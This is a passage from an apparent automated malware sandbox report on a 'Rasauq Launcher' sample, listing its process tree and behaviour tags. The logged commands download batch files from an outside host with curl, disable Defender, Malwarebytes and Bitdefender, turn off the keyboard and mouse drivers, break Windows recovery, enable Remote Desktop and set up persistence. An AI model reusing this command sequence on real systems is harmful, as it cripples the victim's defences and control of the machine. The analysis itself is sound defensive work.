wrote to memory of 5240 4736 cmd.exe 105 PID 4732 wrote to memory of 3964 4732 cmd.exe 106 PID 4732 wrote to memory of 3964 4732 cmd.exe 106 PID 3056 wrote to memory of 240 3056 Rasauq SoftWorks.exe 107 PID 3056 wrote to memory of 240 3056 Rasauq SoftWorks.exe 107 PID 3056 wrote to memory of 412 3056 Rasauq SoftWorks.exe 109 PID 3056 wrote to memory of 412 3056 Rasauq SoftWorks.exe 109 PID 4732 wrote to memory of 3348 4732 cmd.exe 204 PID 4732 wrote to memory of 3348 4732 cmd.exe 204 PID 4732 wrote to memory of 2908 4732 cmd.exe 112 PID 4732 wrote to memory of 2908 4732 cmd.exe 112 PID 4732 wrote to memory of 2396 4732 cmd.exe 206 PID 4732 wrote to memory of 2396 4732 cmd.exe 206 PID 4732 wrote to memory of 1940 4732 cmd.exe 114 PID 4732 wrote to memory of 1940 4732 cmd.exe 114 PID 4732 wrote to memory of 2672 4732 cmd.exe 218 PID 4732 wrote to memory of 2672 4732 cmd.exe 218 PID 3056 wrote to memory of 1868 3056 Rasauq SoftWorks.exe 116 PID 3056 wrote to memory of 1868 3056 Rasauq SoftWorks.exe 116 PID 4736 wrote to memory of 2436 4736 cmd.exe 117 PID 4736 wrote to memory of 2436 4736 cmd.exe 117 PID 4732 wrote to memory of 396 4732 cmd.exe 119 PID 4732 wrote to memory of 396 4732 cmd.exe 119 PID 4736 wrote to memory of 3276 4736 cmd.exe 120 PID 4736 wrote to memory of 3276 4736 cmd.exe 120 PID 4732 wrote to memory of 3580 4732 cmd.exe 222 PID 4732 wrote to memory of 3580 4732 cmd.exe 222 PID 4736 wrote to memory of 3960 4736 cmd.exe 122 PID 4736 wrote to memory of 3960 4736 cmd.exe 122 PID 4732 wrote to memory of 3396 4732 cmd.exe 123 PID 4732 wrote to memory of 3396 4732 cmd.exe 123 PID 4732 wrote to memory of 1732 4732 cmd.exe 124 PID 4732 wrote to memory of 1732 4732 cmd.exe 124 PID 4736 wrote to memory of 4552 4736 cmd.exe 125 PID 4736 wrote to memory of 4552 4736 cmd.exe 125 PID 4736 wrote to memory of 468 4736 cmd.exe 126 PID 4736 wrote to memory of 468 4736 cmd.exe 126 PID 4736 wrote to memory of 4020 4736 cmd.exe 127 PID 4736 wrote to memory of 4020 4736 cmd.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2112 attrib.exe 4316 attrib.exe -
cURL User-Agent 64 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 459 curl/8.7.1 HTTP User-Agent header 147 curl/8.7.1 HTTP User-Agent header 376 curl/8.7.1 HTTP User-Agent header 506 curl/8.7.1 HTTP User-Agent header 145 curl/8.7.1 HTTP User-Agent header 214 curl/8.7.1 HTTP User-Agent header 227 curl/8.7.1 HTTP User-Agent header 244 curl/8.7.1 HTTP User-Agent header 262 curl/8.7.1 HTTP User-Agent header 270 curl/8.7.1 HTTP User-Agent header 339 curl/8.7.1 HTTP User-Agent header 470 curl/8.7.1 HTTP User-Agent header 155 curl/8.7.1 HTTP User-Agent header 92 curl/8.7.1 HTTP User-Agent header 330 curl/8.7.1 HTTP User-Agent header 402 curl/8.7.1 HTTP User-Agent header 415 curl/8.7.1 HTTP User-Agent header 232 curl/8.7.1 HTTP User-Agent header 277 curl/8.7.1 HTTP User-Agent header 282 curl/8.7.1 HTTP User-Agent header 315 curl/8.7.1 HTTP User-Agent header 362 curl/8.7.1 HTTP User-Agent header 104 curl/8.7.1 HTTP User-Agent header 187 curl/8.7.1 HTTP User-Agent header 377 curl/8.7.1 HTTP User-Agent header 411 curl/8.7.1 HTTP User-Agent header 191 curl/8.7.1 HTTP User-Agent header 240 curl/8.7.1 HTTP User-Agent header 265 curl/8.7.1 HTTP User-Agent header 343 curl/8.7.1 HTTP User-Agent header 468 curl/8.7.1 HTTP User-Agent header 543 curl/8.7.1 HTTP User-Agent header 544 curl/8.7.1 HTTP User-Agent header 87 curl/8.7.1 HTTP User-Agent header 200 curl/8.7.1 HTTP User-Agent header 399 curl/8.7.1 HTTP User-Agent header 428 curl/8.7.1 HTTP User-Agent header 553 curl/8.7.1 HTTP User-Agent header 114 curl/8.7.1 HTTP User-Agent header 233 curl/8.7.1 HTTP User-Agent header 299 curl/8.7.1 HTTP User-Agent header 314 curl/8.7.1 HTTP User-Agent header 340 curl/8.7.1 HTTP User-Agent header 484 curl/8.7.1 HTTP User-Agent header 492 curl/8.7.1 HTTP User-Agent header 183 curl/8.7.1 HTTP User-Agent header 208 curl/8.7.1 HTTP User-Agent header 425 curl/8.7.1 HTTP User-Agent header 144 curl/8.7.1 HTTP User-Agent header 157 curl/8.7.1 HTTP User-Agent header 311 curl/8.7.1 HTTP User-Agent header 502 curl/8.7.1 HTTP User-Agent header 509 curl/8.7.1 HTTP User-Agent header 81 curl/8.7.1 HTTP User-Agent header 141 curl/8.7.1 HTTP User-Agent header 213 curl/8.7.1 HTTP User-Agent header 274 curl/8.7.1 HTTP User-Agent header 359 curl/8.7.1 HTTP User-Agent header 408 curl/8.7.1 HTTP User-Agent header 74 curl/8.7.1 HTTP User-Agent header 319 curl/8.7.1 HTTP User-Agent header 221 curl/8.7.1 HTTP User-Agent header 260 curl/8.7.1 HTTP User-Agent header 174 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5108
-
-
-
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2112
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE9A4.tmp.bat""3⤵PID:2824
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:1792
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:1464 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵PID:3120
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:3144
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵PID:4388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4400
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:005⤵
- Scheduled Task/Job: Scheduled Task
PID:1988
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\system32\curl.execurl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵PID:4776
-
-
C:\Windows\system32\curl.execurl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵PID:2820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\system32\openfiles.exeopenfiles4⤵PID:4936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5056
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵PID:3964
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
PID:3348
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵PID:2908
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵PID:2396
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:1940
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵PID:2672
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵PID:396
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:3580
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵PID:3396
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1732
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:2732
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:6048
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5436
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
- Launches sc.exe
PID:2468
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:5608
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:3776
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:972
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:6120
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4260
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:5844
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵PID:1656
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:5132
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵PID:1064
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:4168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3516
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
PID:1284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6088
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵PID:5656
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵PID:1888
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵PID:300
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵PID:3900
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵PID:4756
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵PID:5072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵PID:1788
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4780
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵PID:4304
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵PID:3104
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1520
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6008
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2396
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:6076
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
PID:5476
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵PID:5864
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:4364
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:2260
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵PID:3780
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:2672
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:4604
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:3580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2892
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4192
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4216
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
PID:5352
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
PID:5932
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
PID:3604
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
PID:3940
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵PID:4432
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
PID:4880
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵
- Launches sc.exe
PID:6136
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
PID:2372
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵PID:4976
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵
- Launches sc.exe
PID:5692
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
- Launches sc.exe
PID:3924
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
- Launches sc.exe
PID:6044
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵
- Launches sc.exe
PID:5384
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
- Launches sc.exe
PID:5076
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵PID:4784
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵PID:3472
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵PID:4388
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵PID:4324
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵PID:4716
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵PID:1764
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
PID:5052
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
PID:544
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
PID:1064
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
PID:4400
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
PID:312
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
PID:2796
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
PID:2968
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
PID:1660
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
PID:2532
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵
- Launches sc.exe
PID:1032
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵
- Launches sc.exe
PID:2396
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵PID:5544
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
- Launches sc.exe
PID:4292
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵
- Launches sc.exe
PID:480
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵
- Launches sc.exe
PID:5864
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵
- Launches sc.exe
PID:1988
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵
- Launches sc.exe
PID:4364
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵
- Launches sc.exe
PID:1140
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵
- Launches sc.exe
PID:3780
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵PID:2436
-
-
C:\Windows\system32\sc.exesc delete bdsubwiz4⤵
- Launches sc.exe
PID:5576
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵PID:4604
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵PID:5648
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵
- Launches sc.exe
PID:1308
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵
- Launches sc.exe
PID:4056
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
PID:2868
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
- Launches sc.exe
PID:1172
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵PID:4396
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵PID:4560
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵PID:4052
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵PID:4044
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵PID:5684
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵PID:1824
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵PID:5828
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵PID:5224
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵PID:3224
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵PID:2280
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵PID:1148
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4072
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵PID:5300
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵PID:1504
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵PID:3752
-
-
